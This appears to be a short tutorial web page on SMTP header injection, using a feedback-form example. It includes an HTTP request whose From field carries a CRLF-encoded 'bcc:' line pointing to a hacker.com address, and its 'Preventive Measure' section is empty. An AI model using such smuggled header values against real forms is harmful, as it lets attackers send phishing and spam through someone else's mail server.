Open In App

We use cookies to ensure you have the best browsing experience on our website. By using our site, you acknowledge that you have read and understood our Cookie Policy & Privacy Policy

SMTP Injection

SMTP stands for Simple Mail Transfer Protocol. It is an application layer protocol that handles the sending, receiving, and forwarding of emails on the server. A client that wants to send an email first opens a TCP connection to the SMTP server and sends an email over that connection.

 

Example:

Suppose there is an application requesting the following form to submit feedback:



POST feedback.php HTTP/1.1
Host: geeksforgeeks.com
Content-Length: 70
From=gfglover@gmail.com & Subject=GFG+Site+feedback
& Message=love+geeksforgeeks+3000

After submitting the input, the web application executes the SMTP program using the following command:

MAIL FROM:gfglover@gmail.com

RCPT TO:feedback@geeksforgeeks.com

DATA
From: gfglover@gmail.com
To:feedback@geeksforgeeks.com
Subject:GFG Site feedback
love geeksforgeeks 3000
.

SMTP injection is an attack technique where hackers exploit an application’s mail and web servers, and if the input is not carefully protected, then hackers can send emails to targeted users. Hackers do this to send phishing emails and any type of malicious attachments.



Steps Performed to perform SMTP Injection attack:

POST feedback.php HTTP/1.1
Host: geeksforgeeks.com
Content-Length: 70
From=gfglover@gmail.com%0d%0a 
bcc:hackername%40hacker.com & Subject=Site+
feedback & Message=love+geeksforgeeks+3000

Preventive Measure:

Article Tags :
Ethical Hacking
Recommended Articles
1. What is SMTP Header Injection?
2. Testing For IMAP SMTP Injection
3. SMTP Enumeration
4. What are Injection Flaws?
5. How to Protect Against SQL Injection Attacks?
6. What is CSV Injection?
7. SQL Injection Cheat Sheet
8. Types of SQL Injection (SQLi)
9. How a Connection String Injection Attack is Performed?
10. What is SQL Injection UNION Attacks?
11. XPath Injection
12. Difference Between XSS and SQL Injection